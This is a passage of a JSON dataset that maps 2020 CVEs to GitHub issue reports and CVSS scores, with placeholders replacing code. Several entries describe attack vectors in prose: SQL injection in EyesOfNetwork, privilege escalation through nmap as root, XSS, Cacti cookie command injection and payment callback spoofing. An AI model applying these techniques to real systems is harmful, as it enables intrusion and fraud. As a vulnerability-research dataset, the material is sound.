  62525. "description": "Elevation de privil\u00e8ges possible depuis l'utilisateur apache.. Bonjour, Il est possible pour l'utilisateur apache d\u2019ex\u00e9cuter des commandes arbitraires en tant que l'utilisateur root. Voici la configuration par d\u00e9faut pr\u00e9sente pour l'utilisateur apache sur EON NUMBERTAG CODETAG Un utilisateur peut utiliser la commande nmap pour ex\u00e9cuter des commandes arbitraires en tant que 'root' en utilisant un script NSE sp\u00e9cialement con\u00e7u. Preuve de concept: FILETAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel.",
  62526. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62527. "severity": "HIGH",
  62528. "baseScore": 7.8,
  62529. "impactScore": 5.9,
  62530. "exploitabilityScore": 1.8
  62531. },
  62532. {
  62533. "CVE_ID": "CVE-2020-8656",
  62534. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/16",
  62535. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/16",
  62536. "Repo_new": "eyesofnetworkcommunity/eonapi",
  62537. "Issue_Created_At": "2020-02-05T13:20:52Z",
  62538. "description": "Injection SQL sur le champ username de APITAG Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le champ username de la fonction APITAG Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG classique t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
  62539. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62540. "severity": "CRITICAL",
  62541. "baseScore": 9.8,
  62542. "impactScore": 5.9,
  62543. "exploitabilityScore": 3.9
  62544. },
  62545. {
  62546. "CVE_ID": "CVE-2020-8657",
  62547. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonapi/issues/17",
  62548. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonapi/issues/17",
  62549. "Repo_new": "eyesofnetworkcommunity/eonapi",
  62550. "Issue_Created_At": "2020-02-05T14:03:19Z",
  62551. "description": "Cl\u00e9s d'API pr\u00e9dictible/bruteforcable. Bonjour, Il a \u00e9t\u00e9 observ\u00e9 que la cl\u00e9 d'API par d\u00e9faut d'une installation de EON NUMBERTAG reste inchang\u00e9e apr\u00e8s une installation ( APITAG ) et cet \u00e9l\u00e9ment de configuration ne semble pas accessible dans l'interface d\u2019administration WEB. Le calcul du token d'API d'un utilisateur est bas\u00e9 sur la cl\u00e9, son ID ainsi que l'IP du serveur. L'ID du compte admin est NUMBERTAG et l'adresse IP du serveur est connue (sauf si NAT en place). CODETAG Il devient alors trivial de calculer le token du compte admin. Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel. La version report\u00e9e de l'API est la NUMBERTAG avec l'installation de EON.",
  62552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62553. "severity": "CRITICAL",
  62554. "baseScore": 9.8,
  62555. "impactScore": 5.9,
  62556. "exploitabilityScore": 3.9
  62557. },
  62558. {
  62559. "CVE_ID": "CVE-2020-8788",
  62560. "Issue_Url_old": "https://github.com/ClearCanvas/ClearCanvas/issues/227",
  62561. "Issue_Url_new": "https://github.com/clearcanvas/clearcanvas/issues/227",
  62562. "Repo_new": "clearcanvas/clearcanvas",
  62563. "Issue_Created_At": "2019-07-24T21:37:53Z",
  62564. "description": "Cross site Scripting (XSS) and HTML Injection on APITAG APITAG NUMBERTAG Alpha. Hello, I found two vulnerabilities that affect to APITAG APITAG NUMBERTAG Alpha: Cross site Scripting (XSS) reflected HTML Injection You can reproduce both with the following details NUMBERTAG Payload: APITAG xss NUMBERTAG ulnerable POST data: APITAG APITAG xss NUMBERTAG Output: APITAG A potentially dangerous APITAG value was detected from the client APITAG APITAG ...\"). APITAG NUMBERTAG Step NUMBERTAG Open PATHTAG or PATHTAG URL login page according your config deployments NUMBERTAG Step NUMBERTAG Fill the username and password inputs with XSS/HTML payload and submit the login form NUMBERTAG Step NUMBERTAG Then, you will have a XSS/HTML injections clicking on payload. FILETAG FILETAG If you need reproduce, fix the issue, or more details about that, please, feel free to ping me URLTAG .",
  62565. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62566. "severity": "MEDIUM",
  62567. "baseScore": 6.1,
  62568. "impactScore": 2.7,
  62569. "exploitabilityScore": 2.8
  62570. },
  62571. {
  62572. "CVE_ID": "CVE-2020-8811",
  62573. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1131",
  62574. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1131",
  62575. "Repo_new": "bludit/bludit",
  62576. "Issue_Created_At": "2020-02-05T04:06:25Z",
  62577. "description": "Security Arbitrary Change Profile Picture. Describe This vulnerability allows authenticated users to change other users' profile pictures. Steps to reproduce the vulnerability NUMBERTAG Tried to log in with Administrator privilege. We found NUMBERTAG accounts. \ufeff FILETAG Moreover, we can directly access Profile Pictures like this _ URLTAG FILETAG FILETAG FILETAG NUMBERTAG Tried to log in with limited privilege (username: admon2, role: Editor). FILETAG From an HTTP Request to perform to change a user picture. FILETAG We could change the username to another username. FILETAG As a result, we could change the profile picture of another user. FILETAG FILETAG Login with Administrator to verify the change via username \u201cadmin\u201d and found a profile picture has changed. FILETAG In addition, we could arbitrarily create a picture (png) in other directories. FILETAG FILETAG Comments The vulnerability doesn't validate authorization before the upload process. Moreover, it could be pulled username from trusted source Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
  62578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  62579. "severity": "MEDIUM",
  62580. "baseScore": 4.3,
  62581. "impactScore": 1.4,
  62582. "exploitabilityScore": 2.8
  62583. },
  62584. {
  62585. "CVE_ID": "CVE-2020-8812",
  62586. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1132",
  62587. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1132",
  62588. "Repo_new": "bludit/bludit",
  62589. "Issue_Created_At": "2020-02-05T04:14:38Z",
  62590. "description": "Security Stored Cross Site Script. Describe This vulnerability allows Editor or Author roles to insert malicious APITAG in the WYSIWYG editor. Steps to reproduce the vulnerability Affected in Bludit NUMBERTAG Tried to login with username \u201cadmon2\u201d, who is an Editor. Then, pressed the button. FILETAG FILETAG We inserted a simple APITAG for APITAG FILETAG As a result, we could insert malicious APITAG on the WYSIWYG editor. FILETAG But the CMS had inserted APITAG when web applications issued a token to web browser, so the attacker couldn\u2019t steal the cookie. FILETAG But the attacker still crafted malicious APITAG to do anything. I.e. force every legitimate user to log out of the web application FILETAG As a result, we could force legitimate users to log out. FILETAG Bludit version Affected in Bludit NUMBERTAG PHP version PHP Version NUMBERTAG",
  62591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62592. "severity": "MEDIUM",
  62593. "baseScore": 5.4,
  62594. "impactScore": 2.7,
  62595. "exploitabilityScore": 2.3
  62596. },
  62597. {
  62598. "CVE_ID": "CVE-2020-8813",
  62599. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3285",
  62600. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3285",
  62601. "Repo_new": "cacti/cacti",
  62602. "Issue_Created_At": "2020-02-23T06:03:06Z",
  62603. "description": "When guest users have access to realtime graphs, remote code could be executed ( CVETAG ). Describe the bug Mohammad Askar of APITAG has reported that FILETAG prior to NUMBERTAG allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real time privilege. To Reproduce Steps to reproduce the behavior NUMBERTAG Enable the guest account NUMBERTAG Ensure the guest account has full access to realtime graphs NUMBERTAG Change the APITAG cookie to have malformed characters which could run a script. Expected behavior The raw output of the cookie should be treated as insecure and as such, a validated version of the value utilised. Additional context This was reported as CVETAG",
  62604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62605. "severity": "HIGH",
  62606. "baseScore": 8.8,
  62607. "impactScore": 5.9,
  62608. "exploitabilityScore": 2.8
  62609. },
  62610. {
  62611. "CVE_ID": "CVE-2020-8818",
  62612. "Issue_Url_old": "https://github.com/cardgate/magento2/issues/54",
  62613. "Issue_Url_new": "https://github.com/cardgate/magento2/issues/54",
  62614. "Repo_new": "cardgate/magento2",
  62615. "Issue_Created_At": "2020-02-24T18:42:21Z",
  62616. "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: Magento NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
  62617. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  62618. "severity": "HIGH",
  62619. "baseScore": 8.1,
  62620. "impactScore": 5.2,
  62621. "exploitabilityScore": 2.8
  62622. },
  62623. {
  62624. "CVE_ID": "CVE-2020-8819",
  62625. "Issue_Url_old": "https://github.com/cardgate/woocommerce/issues/18",
  62626. "Issue_Url_new": "https://github.com/cardgate/woocommerce/issues/18",
  62627. "Repo_new": "cardgate/woocommerce",
  62628. "Issue_Created_At": "2020-02-24T18:40:59Z",
  62629. "description": "Public disclosure on CVETAG Unauthorized Payments Hijacking + Order Status Spoofing]. [ CVETAG CVETAG Lack of origin authentication ( CVETAG CVETAG at IPN callback processing function allow ( even _unauthorized_ ) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: APITAG NUMBERTAG APITAG NUMBERTAG FILETAG APITAG of Concept APITAG APITAG ERRORTAG APITAG APITAG",
  62630. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  62631. "severity": "HIGH",
  62632. "baseScore": 8.1,
  62633. "impactScore": 5.2,
  62634. "exploitabilityScore": 2.8
  62635. },
  62636. {
  62637. "CVE_ID": "CVE-2020-8823",
  62638. "Issue_Url_old": "https://github.com/theyiyibest/Reflected-XSS-on-SockJS/issues/1",
  62639. "Issue_Url_new": "https://github.com/theyiyibest/reflected-xss-on-sockjs/issues/1",
  62640. "Repo_new": "theyiyibest/reflected-xss-on-sockjs",
  62641. "Issue_Created_At": "2020-02-14T14:57:10Z",
  62642. "description": "Affected version and product name accurate?. I'm concerned the public text of CVETAG isn't well defined enough for development teams to patch the affected library. Can you provide more details to help? Specifically the concern is that product name and version number do not match clearly with APITAG APITAG seems to be a product family and not a single product. The entire product family does not look to be affected, and the issue seems to reside in sockjs node. Is this correct? The version number is also confusing, as sockjs node is currently listed as being NUMBERTAG Was the library released on another platform as version NUMBERTAG It would be appreciated if you can help update the CVE text to be more clear about what is affected. I assume this has been reported to the authors of APITAG They may be able to help pinpoint exactly what needs to be updated in the wording",
  62643. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62644. "severity": "MEDIUM",
  62645. "baseScore": 6.1,
  62646. "impactScore": 2.7,
  62647. "exploitabilityScore": 2.8
  62648. },
  62649. {
  62650. "CVE_ID": "CVE-2020-8840",
  62651. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2620",
  62652. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2620",
  62653. "Repo_new": "fasterxml/jackson-databind",
  62654. "Issue_Created_At": "2020-02-09T22:50:59Z",
  62655. "description": "Block one more gadget type (xbean reflect/JNDI CVE NUMBERTAG NOTE: a placeholder until complete information gathered] Another gadget ( ) type reported related to JNDI access. See URLTAG for description of the general problem. Mitre id: TO BE ALLOCATED Original discoverer: threedr3am Fixed in NUMBERTAG most likely) does not affect NUMBERTAG and later",
  62656. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62657. "severity": "CRITICAL",
  62658. "baseScore": 9.8,
  62659. "impactScore": 5.9,
  62660. "exploitabilityScore": 3.9
  62661. },
  62662. {
  62663. "CVE_ID": "CVE-2020-8908",
  62664. "Issue_Url_old": "https://github.com/google/guava/issues/4011",
  62665. "Issue_Url_new": "https://github.com/google/guava/issues/4011",
  62666. "Repo_new": "google/guava",
  62667. "Issue_Created_At": "2020-09-08T22:13:01Z",
  62668. "description": "APITAG local information disclosure vulnerability. Since the fix for this vulnerability is now disclosed by this commit ( URLTAG and it was closed internally by Google as APITAG Functionality' I figure I'll disclose the vulnerability fully. Vulnerability CODETAG On the flip side, when using APITAG , this creates a directory with the correct file permissions. CODETAG Impact The impact of this vulnerability is that the file permissions on the file created by APITAG allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because by default on Unix-like operating systems the APITAG directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system. Resolution The resolution by the Google team was the following: > The team decided to document the behavior, as well as deprecate the method as other alternatives exist. This completely makes sense to me, and I think is appropriate. The open question that exists in my mind is whether or not this issue warrants having a CVE number issued.",
  62669. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62670. "severity": "LOW",
  62671. "baseScore": 3.3,
  62672. "impactScore": 1.4,
  62673. "exploitabilityScore": 1.8
  62674. },
  62675. {
  62676. "CVE_ID": "CVE-2020-8927",
  62677. "Issue_Url_old": "https://github.com/bitemyapp/brotli2-rs/issues/45",
  62678. "Issue_Url_new": "https://github.com/bitemyapp/brotli2-rs/issues/45",
  62679. "Repo_new": "bitemyapp/brotli2-rs",
  62680. "Issue_Created_At": "2021-12-20T21:10:45Z",
  62681. "description": "Packaged version of brotli is affected by CVETAG . Brotli versions prior to NUMBERTAG are affected by CVETAG . URLTAG This is an integer overflow and I believe it is reachable from the Rust bindings, but that's just based on a quick perusal of the source code.",
  62682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  62683. "severity": "MEDIUM",
  62684. "baseScore": 6.5,
  62685. "impactScore": 2.5,
  62686. "exploitabilityScore": 3.9
  62687. },
  62688. {
  62689. "CVE_ID": "CVE-2020-8927",
  62690. "Issue_Url_old": "https://github.com/github/advisory-database/issues/785",
  62691. "Issue_Url_new": "https://github.com/github/advisory-database/issues/785",
  62692. "Repo_new": "github/advisory-database",
  62693. "Issue_Created_At": "2022-10-31T20:04:11Z",
  62694. "description": "Update impacted packages for CVETAG . Hi, This list of impacted packages is based on input from the .NET team. //cc MENTIONTAG MENTIONTAG MENTIONTAG , I would have used the Advisory update UX to update URLTAG but this list is just so long \ud83d\ude06 CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | URLTAG | URLTAG | URLTAG | APITAG arm | APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG 
APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
  62695. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  62696. "severity": "MEDIUM",
  62697. "baseScore": 6.5,
  62698. "impactScore": 2.5,
  62699. "exploitabilityScore": 3.9
  62700. },
  62701. {
  62702. "CVE_ID": "CVE-2020-8981",
  62703. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/338",
  62704. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/338",
  62705. "Repo_new": "mantisbt-plugins/source-integration",
  62706. "Issue_Created_At": "2020-02-13T13:33:38Z",
  62707. "description": "XSS in Delete Repository page. This is related to NUMBERTAG Steps to reproduce NUMBERTAG Create a new repository, set repo name to APITAG NUMBERTAG Update and go back to Manage Repository page NUMBERTAG Click on APITAG Repository_ CVE request pending.",
  62708. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62709. "severity": "MEDIUM",
  62710. "baseScore": 6.1,
  62711. "impactScore": 2.7,
  62712. "exploitabilityScore": 2.8
  62713. },
  62714. {
  62715. "CVE_ID": "CVE-2020-9272",
  62716. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/902",
  62717. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/902",
  62718. "Repo_new": "proftpd/proftpd",
  62719. "Issue_Created_At": "2020-02-18T17:15:00Z",
  62720. "description": "Out-of-bounds read in getstateflags function. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary: An out of bounds (OOB) read vulnerability has been detected in mod_cap. Description: The APITAG function in \"cap_text.c\" makes a call to getstateflags(caps, n) [line NUMBERTAG When getstateflags(cap_t caps, int capno) is called, \"capno\" is equal to NUMBERTAG so \"isset_cap((__cap_s )(&caps APITAG will be expanded to \"&((__cap_s )(&caps APITAG >_blk NUMBERTAG accessing caps APITAG that is outside of the \"caps\" struct bounds NUMBERTAG ae4 to NUMBERTAG af7 in our example) APITAG As a result, OOB reads occur, accessing a memory location that is outside of the boundaries of the caps struct variable. This bug affects neither APITAG nor APITAG This is because in these cases the \"permitted\" and \"inheritable\" members are located just after them APITAG Please let me know when you have fixed the bugs so that I can coordinate my disclosure with yours. For reference, here is a link to APITAG vulnerability disclosure policy: URLTAG Thank you, Antonio Morales APITAG Security Lab Team",
  62721. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  62722. "severity": "HIGH",
  62723. "baseScore": 7.5,
  62724. "impactScore": 3.6,
  62725. "exploitabilityScore": 3.9
  62726. },
  62727. {
  62728. "CVE_ID": "CVE-2020-9273",
  62729. "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/903",
  62730. "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/903",
  62731. "Repo_new": "proftpd/proftpd",
  62732. "Issue_Created_At": "2020-02-18T17:27:21Z",
  62733. "description": "Use after free vulnerability in memory pool allocator. This vulnerability was previously reported via email to EMAILTAG rg and has been made public after the fix has been developed. Credit This issue was discovered and reported by APITAG Security Lab team member MENTIONTAG APITAG Morales). Summary A use after free vulnerability exists in APITAG Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system. Product APITAG Tested Version APITAG (development version) Details Use after free vulnerability in memory pool allocator It is possible to corrupt the APITAG memory pool by interrupting the current data transfer APITAG Exploit Demo APITAG In our APITAG the program crashes in the \"alloc_pool\" function (pool.c). This function executes the instruction first_avail = blok >h.first_avail. As you can see, the right-hand operand of the assignment in APITAG is p >last APITAG However, the problem is that \"p\" is a corrupted pool APITAG The source of the problem comes from the pcalloc call in APITAG APITAG This function calls the \"alloc_pool\" function again, which calls \"new_block\" to obtain a new freed memory block APITAG But the memory block returned by \"new_block\" is referenced by the \"p\" pool. So, in short, \"p\" is a dangling pointer due to a use-after-free vulnerability. It's important to note that our tests have shown that this vulnerability can also lead to other vulnerabilities (such as an OOB write), so it increases the severity of the vulnerability. Impact This issue may lead to Post Auth RCE (maybe FTP anonymous users are also affected). Disclosure Policy This report is subject to a NUMBERTAG day coordinated disclosure policy. The disclosure deadline for the findings outlined in this report is NUMBERTAG",
  62734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62735. "severity": "HIGH",
  62736. "baseScore": 8.8,
  62737. "impactScore": 5.9,
  62738. "exploitabilityScore": 2.8
  62739. },
  62740. {
  62741. "CVE_ID": "CVE-2020-9329",
  62742. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5926",
  62743. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5926",
  62744. "Repo_new": "gogs/gogs",
  62745. "Issue_Created_At": "2020-02-19T18:09:37Z",
  62746. "description": "Race condition can make APITAG useless. Description Users could potentially create more repos than specified in APITAG as the APITAG field is not updated in a race-condition-safe manner (i.e. the row is not locked). Such a logic error could be fatal in some specific settings. Reason PATHTAG ERRORTAG APITAG Execute the following script in the console of the user: CODETAG The resultant APITAG is less than NUMBERTAG it is NUMBERTAG in my settings) though NUMBERTAG repos are created. Solution Indeed, some other fields also need locking but are not that crucial to the integrity of the system. CODETAG Or stop using fields in the user table to save the value, as it could be counted directly by using the repository table.",
  62747. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  62748. "severity": "MEDIUM",
  62749. "baseScore": 5.9,
  62750. "impactScore": 3.6,
  62751. "exploitabilityScore": 2.2
  62752. },
  62753. {
  62754. "CVE_ID": "CVE-2020-9369",
  62755. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/886",
  62756. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/886",
  62757. "Repo_new": "sympa-community/sympa",
  62758. "Issue_Created_At": "2020-02-24T04:26:11Z",
  62759. "description": "FILETAG (published later). Pull request has been prepared and will be submitted soon.",
  62760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62761. "severity": "HIGH",
  62762. "baseScore": 7.5,
  62763. "impactScore": 3.6,
  62764. "exploitabilityScore": 3.9
  62765. },
  62766. {
  62767. "CVE_ID": "CVE-2020-9447",
  62768. "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/32",
  62769. "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/32",
  62770. "Repo_new": "manolo/gwtupload",
  62771. "Issue_Created_At": "2020-02-12T17:14:35Z",
  62772. "description": "XSS in the file upload functionality. There is an APITAG site scripting) present in the file upload functionality, where someone can upload a file with a malicious filename, which contains APITAG code, which results in XSS. Example: FILETAG FILETAG How to reproduce NUMBERTAG Deploy the APITAG war file ( FILETAG NUMBERTAG Upload a file from a Linux system (due to Windows filename character restrictions), which contains APITAG code. For example: a APITAG",
  62773. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62774. "severity": "MEDIUM",
  62775. "baseScore": 6.1,
  62776. "impactScore": 2.7,
  62777. "exploitabilityScore": 2.8
  62778. },
  62779. {
  62780. "CVE_ID": "CVE-2020-9465",
  62781. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/51",
  62782. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/51",
  62783. "Repo_new": "eyesofnetworkcommunity/eonweb",
  62784. "Issue_Created_At": "2020-02-26T17:32:06Z",
  62785. "description": "Injection SQL sur le cookie user_id. Bonjour, Il est possible de r\u00e9aliser une injection SQL sur le cookie APITAG . Il a \u00e9t\u00e9 observ\u00e9 que cette injection est possible sur les pages APITAG , APITAG et APITAG sans authentification pr\u00e9alable. Exemple d'injection de code utilisant la fonction sleep NUMBERTAG ERRORTAG L'exploitation d'une telle injection SQL peut permettre \u00e0 un attaquant d'obtenir des acc\u00e8s administrateurs sur l'application (r\u00e9cup\u00e9ration de session_id admin, dump de table users). Ceci a \u00e9t\u00e9 test\u00e9 sur une installation de EON NUMBERTAG et NUMBERTAG t\u00e9l\u00e9charg\u00e9e \u00e0 partir du site officiel (la NUMBERTAG doit probablement aussi \u00eatre vuln\u00e9rable). Le fichier source permettant l\u2019injection SQL est APITAG au morceau de code suivant : CODETAG",
  62786. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62787. "severity": "CRITICAL",
  62788. "baseScore": 9.8,
  62789. "impactScore": 5.9,
  62790. "exploitabilityScore": 3.9
  62791. },
  62792. {
  62793. "CVE_ID": "CVE-2020-9467",
  62794. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1168",
  62795. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1168",
  62796. "Repo_new": "piwigo/piwigo",
  62797. "Issue_Created_At": "2020-03-24T13:03:01Z",
  62798. "description": "stored XSS with APITAG",
  62799. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62800. "severity": "MEDIUM",
  62801. "baseScore": 5.4,
  62802. "impactScore": 2.7,
  62803. "exploitabilityScore": 2.3
  62804. },
  62805. {
  62806. "CVE_ID": "CVE-2020-9468",
  62807. "Issue_Url_old": "https://github.com/plegall/Piwigo-community/issues/49",
  62808. "Issue_Url_new": "https://github.com/plegall/piwigo-community/issues/49",
  62809. "Repo_new": "plegall/piwigo-community",
  62810. "Issue_Created_At": "2020-03-24T13:19:57Z",
  62811. "description": "[security] ability to bypass protection on photo editing. CVETAG reported by Zak S. > Further, a malicious user can modify the value of the 'image_id' parameter to any existing image id. There are no access controls to prevent a user from manipulating information on images that are in albums to which they do not have access.",
  62812. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  62813. "severity": "MEDIUM",
  62814. "baseScore": 4.3,
  62815. "impactScore": 1.4,
  62816. "exploitabilityScore": 2.8
  62817. },
  62818. {
  62819. "CVE_ID": "CVE-2020-9546",
  62820. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2631",
  62821. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2631",
  62822. "Repo_new": "fasterxml/jackson-databind",
  62823. "Issue_Created_At": "2020-02-27T21:17:02Z",
